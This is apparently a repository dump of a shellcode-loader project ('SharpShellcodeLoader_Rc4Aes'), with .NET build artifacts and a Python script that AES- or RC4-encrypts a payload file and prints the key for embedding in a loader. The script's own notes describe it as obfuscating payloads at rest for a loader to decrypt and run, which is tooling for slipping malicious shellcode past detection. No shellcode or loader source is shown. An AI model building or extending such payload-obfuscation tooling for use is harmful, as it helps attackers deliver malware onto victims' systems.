https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | bd903e1a1fb2f29aa1f31b8873552a5fa8da21c7 2 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.FileListAbsolute.txt: 
-------------------------------------------------------------------------------- 1 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Debug\Shellcode解密加载.exe 2 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Debug\Shellcode解密加载.pdb 3 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.csproj.AssemblyReference.cache 4 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.csproj.CoreCompileInputs.cache 5 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.exe 6 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.pdb 7 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")] 5 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | fdeecec71d762229cb64983ff5a52d1d955c8638 2 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Release\Shellcode解密加载.exe 2 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Release\Shellcode解密加载.pdb 3 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.csproj.AssemblyReference.cache 4 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.csproj.CoreCompileInputs.cache 5 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.exe 6 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.pdb 7 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /encrypt_file.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import sys 4 | from Crypto import Random 5 | from Crypto.Cipher import AES 6 | from Crypto.Util.Padding import pad, unpad 7 | from Crypto.Cipher import ARC4 8 | from base64 import b64encode, b64decode 9 | import string 10 | import os 11 | import secrets 12 | 13 | """ 14 | Requirements: 15 | Must have pycryptodome installed. 
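Install examples:
    python3 -m pip install pycryptodome

Usage:
    encrypt_file.py <aes|rc4> <encrypt|decrypt> <input_file> [key]

Security notes (review):
  * This only obfuscates a payload at rest.  The key is printed to stdout
    and has to be embedded in whatever loader decrypts the output, so anyone
    holding the loader also holds the key.
  * Neither mode provides integrity: AES is used in CBC without a MAC and
    RC4 is a plain stream cipher.  A wrong key on AES surfaces as a PKCS#7
    padding error, on RC4 as silent garbage.
  * RC4 is a broken cipher and is kept only for loaders that implement it.
"""

# Key material: 32 ASCII letters/digits -> 32 UTF-8 bytes -> AES-256
# (also a valid 32-byte RC4 key).  Note that an alphanumeric key carries
# log2(62) ~ 5.95 bits per character, i.e. ~190 bits for 32 characters,
# not the full 256 bits an AES-256 key could hold.
KEY_ALPHABET = string.ascii_letters + string.digits
KEY_LENGTH = 32
# AES variant is selected by key length: 16/24/32 bytes -> AES-128/192/256.
_AES_KEY_LENGTHS = (16, 24, 32)

VALID_MODES = ('aes', 'rc4')
VALID_OPERATIONS = ('encrypt', 'decrypt')
USAGE = 'Usage: encrypt_file.py <aes|rc4> <encrypt|decrypt> <input_file> [key]'


# Generate a random key of KEY_LENGTH ASCII letters/digits.
def generate_key(length=KEY_LENGTH):
    """Return a random key of `length` characters drawn from KEY_ALPHABET.

    `secrets` is a CSPRNG, so the key is suitable for cryptographic use; the
    default length of 32 yields a 32-byte UTF-8 key (AES-256).
    """
    return ''.join(secrets.choice(KEY_ALPHABET) for _ in range(length))


def _aes_key_bytes(key):
    """Encode a str key to bytes and reject lengths AES does not accept.

    pycryptodome would raise the same ValueError inside AES.new(); doing it
    here gives a message that names the actual problem.
    """
    key_bytes = key.encode('utf-8')
    if len(key_bytes) not in _AES_KEY_LENGTHS:
        raise ValueError(
            f'AES key must be 16, 24 or 32 bytes, got {len(key_bytes)}')
    return key_bytes


# AES encryption function.
def aes_encrypt(message, key, key_size=256):
    """AES-CBC encrypt `message` (bytes) under `key` (str).

    Returns IV || ciphertext, where IV is a fresh random 16-byte block
    (never reuse an IV with the same key under CBC).  The message is PKCS#7
    padded to the block size.

    `key_size` is accepted for backward compatibility but not used: the AES
    variant follows from the key length (see _aes_key_bytes).

    Raises ValueError for a key of unsupported length.
    """
    key_bytes = _aes_key_bytes(key)
    padded = pad(message, AES.block_size, style='pkcs7')
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(key_bytes, AES.MODE_CBC, iv)
    # IV is prepended so the decryptor can recover it; it need not be secret.
    return iv + cipher.encrypt(padded)


# AES decryption function.
def aes_decrypt(ciphertext, key):
    """Decrypt IV || ciphertext produced by aes_encrypt and strip padding.

    Raises ValueError if the ciphertext is shorter than one block (no IV),
    if the key length is unsupported, or if the padding is invalid -- the
    latter is how a wrong key shows up, as there is no MAC to check.
    """
    if len(ciphertext) < AES.block_size:
        raise ValueError(
            f'ciphertext too short ({len(ciphertext)} bytes): no IV present')
    key_bytes = _aes_key_bytes(key)
    iv = ciphertext[:AES.block_size]
    cipher = AES.new(key_bytes, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(ciphertext[AES.block_size:]),
                 AES.block_size, style='pkcs7')


def _read_bytes(path):
    """Read a whole file as bytes."""
    with open(path, 'rb') as fo:
        return fo.read()


def _write_bytes(path, data):
    """Write bytes to `path`, replacing any existing file."""
    with open(path, 'wb') as fo:
        fo.write(data)


# AES-encrypt a file.
def aes_encrypt_file(key, in_file, out_file):
    """Read `in_file`, AES-CBC encrypt it under `key`, write to `out_file`."""
    plaintext = _read_bytes(in_file)
    enc = aes_encrypt(plaintext, key)
    _write_bytes(out_file, enc)
    print(f'[*] Read File Bytes: {len(plaintext)}')
    print(f'[*] AES Encrypted File Bytes: {len(enc)}')
    print("[*] AES encrypted file written to: " + out_file)


# AES-decrypt a file.
def aes_decrypt_file(key, in_file, out_file):
    """Read `in_file` (IV || ciphertext), decrypt under `key`, write plaintext.

    Propagates ValueError from aes_decrypt (bad padding == wrong key or
    corrupt input).
    """
    ciphertext = _read_bytes(in_file)
    dec = aes_decrypt(ciphertext, key)
    _write_bytes(out_file, dec)
    print(f'[*] Read File Bytes: {len(ciphertext)}')
    print(f'[*] AES Decrypted File Bytes: {len(dec)}')
    print("[*] AES decrypted file written to: " + out_file)


# RC4-encrypt a file.
def rc4_encrypt_file(key, in_file, out_file):
    """Read `in_file`, RC4 encrypt it under `key` (str), write to `out_file`.

    RC4 has no IV: the same key and plaintext always give the same output,
    and reusing a key across payloads leaks their XOR.  Output length equals
    input length.
    """
    plaintext = _read_bytes(in_file)
    cipher = ARC4.new(key.encode('utf-8'))
    enc = cipher.encrypt(plaintext)
    _write_bytes(out_file, enc)
    print(f'[*] Read File Bytes: {len(plaintext)}')
    print(f'[*] RC4 Encrypted File Bytes: {len(enc)}')
    print("[*] RC4 encrypted file written to: " + out_file)


# RC4-decrypt a file.
def rc4_decrypt_file(key, in_file, out_file):
    """Read `in_file`, RC4 decrypt it under `key` (str), write to `out_file`.

    RC4 is symmetric (keystream XOR), so decrypt is the same operation as
    encrypt; a wrong key yields garbage with no error.
    """
    ciphertext = _read_bytes(in_file)
    cipher = ARC4.new(key.encode('utf-8'))
    dec = cipher.decrypt(ciphertext)
    _write_bytes(out_file, dec)
    print(f'[*] Read File Bytes: {len(ciphertext)}')
    print(f'[*] RC4 Decrypted File Bytes: {len(dec)}')
    print("[*] RC4 decrypted file written to: " + out_file)


def output_path(input_file, operation):
    """Return the output path: next to `input_file`, prefixed by the operation.

    'encrypt' keeps the historical 'encrypt_' prefix; 'decrypt' writes
    'decrypt_<name>' so a decrypted payload is not mislabelled as encrypted.
    """
    prefix = 'encrypt_' if operation == 'encrypt' else 'decrypt_'
    return os.path.join(os.path.dirname(input_file),
                        prefix + os.path.basename(input_file))


def parse_args(argv):
    """Validate a sys.argv-style list.

    Returns (mode, operation, input_file, key) where key is None when not
    supplied.  Raises ValueError (message is user-facing) on a wrong argument
    count, unknown mode/operation, or 'decrypt' without a key -- a freshly
    generated key can never decrypt an existing file.
    """
    if len(argv) not in (4, 5):
        raise ValueError(USAGE)
    mode, operation, input_file = argv[1], argv[2], argv[3]
    if mode not in VALID_MODES or operation not in VALID_OPERATIONS:
        raise ValueError(USAGE)
    key = argv[4] if len(argv) == 5 else None
    if operation == 'decrypt' and key is None:
        raise ValueError(
            'decrypt requires the key used for encryption as the 4th argument\n'
            + USAGE)
    return mode, operation, input_file, key


# Dispatch table: (mode, operation) -> file handler.
_HANDLERS = {
    ('aes', 'encrypt'): aes_encrypt_file,
    ('aes', 'decrypt'): aes_decrypt_file,
    ('rc4', 'encrypt'): rc4_encrypt_file,
    ('rc4', 'decrypt'): rc4_decrypt_file,
}


def main(argv=None):
    """CLI entry point; returns a process exit code (0 ok, 1 failure, 2 usage)."""
    argv = sys.argv if argv is None else argv
    try:
        mode, operation, input_file, key = parse_args(argv)
    except ValueError as err:
        print(err)
        return 2

    if key is None:
        key = generate_key()
        # The key is printed because the loader needs it; see module notes.
        print(f"Generated Key: {key}")

    out_file = output_path(input_file, operation)
    try:
        _HANDLERS[(mode, operation)](key, input_file, out_file)
    except (OSError, ValueError) as err:
        # OSError: unreadable input / unwritable output.
        # ValueError: bad key length or (AES) bad padding, i.e. wrong key.
        print(f'[!] {mode} {operation} failed: {err}')
        return 1
    return 0


if __name__ == '__main__':
    sys.exit(main())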
